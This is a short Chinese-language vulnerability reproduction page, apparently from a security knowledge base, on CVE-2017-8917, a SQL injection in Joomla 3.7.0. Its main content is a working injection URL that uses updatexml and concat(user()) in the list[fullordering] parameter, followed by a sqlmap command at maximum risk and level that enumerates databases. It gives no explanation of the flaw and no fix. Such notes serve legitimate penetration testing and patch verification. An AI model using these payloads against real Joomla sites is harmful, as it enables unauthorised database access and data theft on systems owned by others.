menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 072-Joomla chevron_right 010-(CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    010-(CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞.md
    494 B / 2021-07-17 00:01:28
        # (CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞

### 一、漏洞简介

### 二、漏洞影响

Joomla 3.7.0

### 三、复现过程


```
http://url:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
```

![](images/15899564899358.png)


**补充**


```bash
sqlmap -u "http://url/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```
    links
    file_download